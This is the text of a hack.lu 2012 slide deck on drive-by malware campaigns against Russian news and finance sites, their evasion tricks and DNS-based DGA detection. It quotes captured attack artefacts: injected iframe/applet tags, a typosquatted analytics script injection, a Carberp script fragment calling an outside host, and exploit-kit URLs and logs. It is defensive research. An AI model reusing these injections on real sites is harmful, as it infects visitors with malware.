hacklu2012 v07

CyberCrime 2012As we know it -

Trends, Monitoring,

Real Time Detection

@fygrave@vbkropotov

Presented at hack.lu 2012

3

agenda

CyberCrime 2012: trendsMalicious campaigns in 2012 (case studies)Evolving evasion techniquesAutomating Detection real-timeConclusions

4

About speakers

● We are from Russia.. kind of ;)

5

Cybercrime 2012trends

6

Emerging attack vectors

● DbD – old. Still popular– High profile targets are getting compromised

● Email campaigns – getting bigger, mass mailings to users from compromised targets

● Social Engineering attacks ● Mobile plays active role

7

Malicious Campaigns Sept 2011-Oct 2012

Case studies

8

Autumn 2011kp.ru National-wide newspaper?

● ~550 000 visitors per day● Drive-By..

9

10

Autumn 2011rzd.ru National Railroads?

● ~200 000 visitors per day

● “Gimme a Malware!!”

11

Yepp, rzd-rzd.ru as an intermediate

12

13

Just TWO Domains, SURE?Domain URLinterfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root

rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root

news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root

rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root

therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root

rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root

rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root

rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1

press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root

pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root

14

Campaign

15

italia-new.inbaner-klerk.ru bank-klerk.ru

banner-klerk.ru blogs-klerk.ru buh-klerk.ru daily-kp.ru eg-obzor.ru

forum-klerk.ru i-obozrevatel.ru interfax-region.ru

ipgeobase.in

job-klerk.ru klerk-bank.ru klerk-bankir.ruklerk-biz.ru

klerk-boss.ru klerk-buh.ru

klerk-even.ru klerk-events.ru klerk-forum.ruklerk-law.ru klerk-new.ru klerk-news.ru

klerk-reklama.ru klerk-ru.ru

klerk-work.ru klerk2.ru

obozrevatel-ru.ru obozrevatelru.ru

kp-daily.rukp-kp.in

minsk-kp.inperm-kp.inwiki-klerk.ru

Similar style detected domains

16

Klerk.ru

● Finance related portal ● ~150 000 visitors per day

17

“fileless” bot Campaign 2011 – Oct 2012

● Version 1 (detected) Nov 2011● Version 2 (detected) Feb-Mar 2012● Version 3 (detected) May 2012● Version 4 (detected) First seen in Aug 2012

Last detect in Oct 2012 (distributed via infected banner networks too)

18

glavbukh.ru (Chief Accountant)~45 000 targeted visitors per day

Date detected

IP Domain Url Domain created

Referrer

09/Nov/2011 176.9.50.178 jya56yhsvcsss.com /BVRQ 08/Nov/2011 glavbukh.ru

11/Nov/2011 176.9.50.178 ha526ugfsfh.com /BVRQ 11/Nov/2011 glavbukh.ru

06/Feb/2012 66.199.232.98 zcxrwuj4b.eu /GLMF 26/Jan/2012 glavbukh.ru

13/Feb/2012 66.199.232.9 zaurona.eu /GLMF 08/Feb/2012 glavbukh.ru

20/Apr/2012 64.20.35.194 vuyrtyal.info /RK85 04/Apr/2012 glavbukh.ru

03/May/2012 64.20.35.194 hortezam.info /RK85 24/Apr/2012 glavbukh.ru

19

glavbukh.ru, tks.ru, etc. May 2012

:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=

:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows

20

Drive-by newsru.com ver. Sept 2012

Domains on Sep 11 2012

21

Permanent fails, fileles bot Campaign 2011 – Oct 2012

● Finance related portal ● ~130 000 visitors per day

<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">

<applet archive="/07GICjq" code="Applet.class">

Sep 17 2012 echo.msk.ru ~440 000 visitors per day

22

Permanent fails, fileles bot Campaign 2011 – Oct 2012

<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">

Sep 17 2012 Banner network adfox.ru affected

23

Campaign participants examplesDomain Resource type When seen unique hosts

per day

Vesti.ru TV news Autumn 2012 ~ 930 000

gazeta.ru news Winter 2012-Autumn 2012 ~490 000

newsru.com news Spring 2012 - Autumn 2012 ~470 000

echo.msk.ru radio Autumn 2012 ~440 000

3DNews.ru news Summer 2012 – Autumn 2012 ~180 000

inosmi.ru news Autumn 2011 – Summer 2012 115 000

glavbukh.ru Accountants Winter 2012-Spring 2012 ~45 000

tks.ru Finance (Import/Explort)

Winter 2012-Autumn 2012 ~23 000

24

Mobile scam

http://codbanners.ru

25

Mobile scams

● Fake apps are still big● Android apps avail :)

26

27

• Legal • Faked

Another news,another

phone…

28

29

Evolution of Counter-Detection andEvasion Techniques

31

Malware hostings location interesting examples

Countries, hosters and slide with VPN “#epicfail” in configuration.

Sample in gov.ua and Ogni Moskvu bank

32

Drive By from Bank IP rangeDate/Time 2011-11-25 15:45:27 MSKTag Name Java_Possibly_Malicious_Applet

server 1541897761 URL /dfbgeskdfa/Gmail.class

Packet DestinationAddress 10.X.X.X Packet DestinationPort 42642 Packet SourceAddress 91.231.126.33 Packet SourcePort 80 Packet

netnum: 91.231.126.0 - 91.231.126.255netname: ognmorganisation: ORG-LCM2-RIPEorg-name: LTD CB "OGNI MOSKVY"address: 27 st. New Basmannayaaddress: 105066, Moscow,address: Russiae-mail: info@ognm.ru (mailto:info@ognm.ru)phone: +7 495 7805181

Gmail.class - Exploit:Java/CVE-2010-0840

33

Drive By from State Land Cadastral Center at the State Agency of Land

Resources of Ukraine RangeDate/Time 2011-11-13 11:34:08 MSKTag Name Java_Possibly_Malicious_Applet

server 1539495587 URL /Gmail.class

Packet DestinationAddress 10.X.X.X Packet DestinationPort 40487Packet SourceAddress 91.194.214.163 Packet SourcePort 80 Packet

netnum: 91.194.214.0 - 91.194.215.255netname: SLCCdescr: State Land Cadastral Center at the State Agency of Land Resources of Ukrainecountry: UAorganisation: ORG-SLCC1-RIPEaddress: 3 Narodnogo Opolchenya street, Kiev, Ukraine

Gmail.class - Exploit:Java/CVE-2010-0840

34

Back end Epic Fail Mar 13 2011 VPN 95.163.66.197 real 91.194.214.71

Exploit pack in UA State agency of land resources IP range still alive

35

Not typical (now typical :-) attacks Examples

- Attacks using stolen/misconfigured DNS accounts

- Attacks that require real-user interaction

- Intermediate hostnames with similar hostnames (to make manual analysis trouble-some?)

- Drive by “FTP” types of attacks

36

Stolen domains example:

Time URL IP24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69

24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69

25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69

25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69

25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69

25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69

25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69

26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836

146.185.242.69

31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79

31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79

31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79

31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79

04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79

06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79

37

WHAT'S COMMON

amurt.org.uk 46.227.202.68 Registered on: 15-Oct-1999

Name servers: ns1.afraid.org

air-bagan.org 122.155.190.31 Created On:05-Aug-2006

Name Server:NS1.AFRAID.ORG

fatdiary.org 71.237.151.22 Created On:17-Jul-2006

Name Server:NS1.AFRAID.ORG

prawda2.info 91.192.39.83 Created On:18-Oct-2007

Name Server:NS1.AFRAID.ORG

38

Malware domains reputation and DNS accounts attacks

Starting from August 2012 we detect second wave of this campaign, be careful, examples Sep 2012

alex01.net -> 46.39.237.81 >>> games.alex01.net -> 178.162.132.178

socceradventure.net 72.8.150.14 >>> mobilki.socceradventure.net -> 178.162.132.178

talleresnahuel.com 74.54.202.162 >>> kino.talleresnahuel.com -> 178.162.132.178

qultivator.se 72.8.150.15 >>> 597821.qultivator.se -> 178.162.132.166

39

Carberp campaign Mar – May 2012 with tiny user interaction

function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {

…

40

Hacked Domains from Spring Carberp campaignhoster rel-net.eu 62.122.72.0 - 62.122.79.255

009.ru1.poliklinika72.ru1c-documents.ru232info.rualrf.ruambulatorya.ruarkan.ruaryahome.ruaryatekstil.ruato.ruauto-pik.rubablam.rubadger.rubeauty-breeze.ruberkem.rubestwatch.rubounty72.rubronipoezd.rucar-baby.ruchalet-cpark.rucrocus-hall.ruct.spb.ru

ctc-tv.rudailypixel.rudataplex.rudoctor-istomin.rudraiverton.imho2.rudtr.bydvvs.ruedimvkusno.rueka4.ruexpert-kld.rufamily-fitness.rufastrans.rufflow.rufictionbook.ruflowers-fantasy.rugidrostyle.ruguitarism.ruhmcity.ruhotel-sokol.ruipoteka-tmn.ruizvestia.ru

kb83.comknowingsnibiru.rukolobok80.rukontaktor.rukuhni-mila.rukyokushinkarate.rulaccent.rulenovofans.rulifenews.rumaleton.rumandroid.rumanualbase.rumarianowka.rumarte.rumaxime-and-co.commedin.rumedin.rumenyaraduet.rumexa-n.rumolurist.rumps-energo.runew.turbinist.ru

oilloot.ruorthographia.ruostrov72.rupod-remont.ruregion64.ruremont-

krasnogorsk.rurevital.ruribalkadaohota.rurostteh.rurstmos.rurusso-excursio.frsakuraauto.rusellex.rushop-detect.ruskk-chess.ruskypecashin.ruspdnv.ruspk-up.rusport.optika-8.rustroyoffis.rustud.samgtu.rustyle.aladna.ru

subsidii.nettopsalon.rutouravia.rutushkan.netumade.ruvantatech.ruvash-master-

remont.ruvideoecology.ruvinils.ruvms56.ruvolociki.ruvonny-and-dolan.ruvosesoftware.comwinfield-oil.ruwusley.ruyarglobus.ruzip.ruzooeco.comтурбинист.рф

41

Domains with interesting namesIntermediate domains names often similar to

hacked domain name, or to well known banner network or counter.

Spot the differencies: ●google-analytics.com vs.●google-analylics.com ●google-anatylics.com

42

Trud.ru affected feb 21 2012<script type="text/javascript">

● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●

● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

● </script>● <script type="text/javascript">● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●

● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

● </script>●

● Name: google-analytics.com Addresses: 173.194.32.48●

● Name: www.google-analitycs.com Address: 184.82.149.180●

43

Noproblemslove.com, whoismistergreen.com, etc...

● Bot Infection: Drive-By-HTTP● Payload and intermediate malware

domains:Normal /DynDNS● Distributed via: Compromised web-sites. ● C&C domains: normal.● C&C and Malware domains located on the

different AS. Sophisticated attack scheme. Timeout before activity.

● Typical bot activity: Mass HTTP Post

44

Noproblemslove.com, whoismistergreen.com, etc...

45

Interesting domains from range 184.82.149.178-184.82.149.180 (Feb 2012)

Domain Name IP

www.google-analylics.com 184.82.149.179

google-anatylics.com 184.82.149.178

www.google-analitycs.com 184.82.149.180

webmaster-google.ru 184.82.149.178

paged2.googlesyndlcation.com 184.82.149.179

googlefilter.ru 184.82.149.179

rambler-analytics.ru 184.82.149.179

site-yandex.net 184.82.149.180

paged2.googlesyndlcation.com 184.82.149.179

www.yandex-analytics.ru 184.82.149.178

googles.4pu.com 184.82.149.178

googleapis.www1.biz 184.82.149.178

syn1-adriver.ru 184.82.149.178

46

C&C domainswhoismistergreen.com

IP-адрес: 213.5.68.105

Create: 2011-07-26

Registrant Name: JOHN ABRAHAM

Address: ul. Dubois 119

City: Lodz

noproblemslove.com

213.5.68.105

Created: 2011-12-07

Registrant Contact:

Whois Privacy Protection Service

Whois Agent gmvjcxkxhs@whoisservices.cn

noproblemsbro.com

176.65.166.28

Created: 2011-12-07

Registrant Contact:

Whois Privacy Protection Service

Whois Agent gmvjcxkxhs@whoisservices.cn

patr1ckjane.com

IP Was 176.65.166.28

IP Now 213.5.68.105

Create: 2011-07-21

Registrant Name: patrick jane

Address: ul. Dubois 119

City: Lodz

47

Not typical attacks via FTP

First seen 24/10/2011 11:28 ftp://1572572686/Main.class

Sample Mar 07 java version as a password

48

Domain URL Referrer Payload Size

3645455029 /1/s.html Infected site html 997

Java.com /js/deployJava.js 3645455029 javascript 4923

3645455029 /1/exp.jar application/x-jar

18046

3645455029 /file1.dat application/executable

138352

49

Attack analysis- Script from www. Java.com used during attack.

- Applet exp.jar loaded by FTP

- FTP Server IP address obfuscated to avoid detection

50

Not Found?

51

Interesting modificationsGET http://java.com/ru/download

/windows_ie.jsp?host=java.com%26

returnPage=ftp://217.73.58.181/1/s.html%26

locale=ru HTTP/1.1

Key feature exampleDate/Time 2012-04-20 11:11:49 MSD

Tag Name FTP_Pass

Target IP Address 217.73.63.202

Target Object Name 21

:password Java1.6.0_30@:user anonymous

52

Registrar abuse(1)

● gidzzkc.dogbookeoor-amtuzxo.org. A 91.220.84.7● yqvdmbul.dogbookeoor-amtuzxo.org. A 91.220.84.7● fncalzrmx.dogbookeoor-amtuzxo.org. A 91.220.84.7● ghyyaweczb.dogbookeoor-amtuzxo.org. A 91.220.84.7● vrmvneod.catxnahi-yarndfhh.info. A 91.220.84.6● wrxpvxdudahlu.catxnahi-yarndfhh.info. A 91.220.84.6● owcfudqqlgowwn.catxnahi-yarndfhh.info.A 91.220.84.6● rskgwknaz.video-zgn-gqmbcax.info. A 91.220.84.6● ahlcpdmssw.video-zgn-gqmbcax.info. A 91.220.84.6● xrwxozkniqq.video-zgn-gqmbcax.info. A 91.220.84.6● ighirfzcxdrii.video-zgn-gqmbcax.info. A 91.220.84.6

53

Registrar abuse (2)

● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16

● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16

● Domains disappear without a trace within 30 minutes after use.

54

Registrar abuse (3)● http://raisport.ru/contacts >>>

xugamabpi.arraysort-qmppbkkn-abkn.org

● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org

● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org

55

Legit domains are used ..

11.09.2012

http://out1.sudameris.com.ar/out

qehboobwkqvo.task-games-pta-vywcngn.org

91.237.153.24

56

What could be more flux than fastflux? ;-)

● WHOIS fastflux … HOW?!

Domain ID:D166393631-LRORDomain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORGCreated On:21-Aug-2012 01:23:52 UTCLast Updated On:21-Aug-2012 01:23:53 UTCExpiration Date:21-Aug-2013 01:23:52 UTCSponsoring Registrar:Click Registrar, Inc. d/b/apublicdomainregistry.com (R1935-LROR)Status:CLIENT TRANSFER PROHIBITEDStatus:TRANSFER PROHIBITEDStatus:ADDPERIODRegistrant ID:PP-SP-001Registrant Name:Domain AdminRegistrant Organization:PrivacyProtect.orgRegistrant Street1:ID#10760, PO Box 16Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.orgRegistrant Street3:Registrant City:Nobby BeachRegistrant State/Province:Registrant Postal Code:QLD 4218Registrant Country:AURegistrant Phone:+45.36946676

57

Russian ASN (as5577)

58

Intermediate ev2.ru, SpyEye Campaign

59

Words distribution (len >3) in domain names

60

Incidents vs. timeCIRCL team

informed

61

DEMOTIME: SHOWSOME VIDEOZHERE :)

62

Advanced bots:Social network as C&C

63

Evasion techniques:summary

- Evasion of automated detection of compromised resource (via crawler)- Evasion of automated detection of compromised resource (via sandbox)- Evasion techniques used in exploit serving mechanisms and malicious payloads- Counter-analysis techniques (in infrastructure)

64

Detection 2012

65

Detecting DGA through DNS traffic

Input: DNS packets (passive DNS)Output: list of active domains

List of “could be active” domainsList of “were active” domains

IP addresses used by mal. infrastructure

66

DGA pattern: How it looks on the wire

67

Detecting DGA

● Simplified algorithm:– take domains with failed DNS lookup (rcode: 2, non-

existant domain or rcode:3, domain name server failed)

– Group them by similarity function f(x)

– Find domains with even distribution.– Identify other domains matching the same similarity

criteria f(x)

– Discover relevant IP addresses– Rinse and repeat :)

68

Detection: related works

From Throw-Away Traffic to Bots: Detecting Rise of DGA-Based Malware (Manos Antonakakis, Roberto Redisci et al) (2012)

L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi.

EXPOSURE: Finding malicious domains using

passive dns analysis. In Proceedings of NDSS,

2011

etc..

69

What we do differently:

● “lazy” WHOIS lookups, team cymru IP to ASN lookups

● Our own passive DNS index● Sandbox farm (mainly to detect compromised

websites automagically and study behavior)

70

Architecture

71

Sample analysis (step by step)

● Start looking for a failed pattern and cluster id:

72

Sample analysis (two)

● Get the cluster ID: (eu_11_14)

Clustering is based on domain similarity. Currently used characteristics: - f(zone, pattern (length, depth)) - additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams)- domain registration parameters (obtained via WHOIS [ problematic! ] )- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)

73

Sample analysis

● Get other members of the cluster

74

Sample analysis

● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filering (IP, WHOIS information)

75

Sample analysis

● So we have C&C IP 66.175.210.173● we can continue mining to see if we get any

other domain names:

76

IP → domain transform

77

Automation

78

Performance

● On single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss

● Average load:

79

Other Interesting numbers

● Packets per day: ~130M filtered.● Mal. Domains/day: ~30k DNS queries (varies)● Avg. 30-50 req/minute for single domain●

80

Uses of the data

● Obvious: blacklists● Botnet take overs (costs 11USD or less ;)● Sinkholing

81

Demotime :)

● (demos, lets look at some videos :)

82

Questions?

@fygrave@vbkropotov

83

Feedback:@fygrave

@vbkropotov(also @ gmail.com)

Code:

https://github.com/fygrave/dnslyzer.git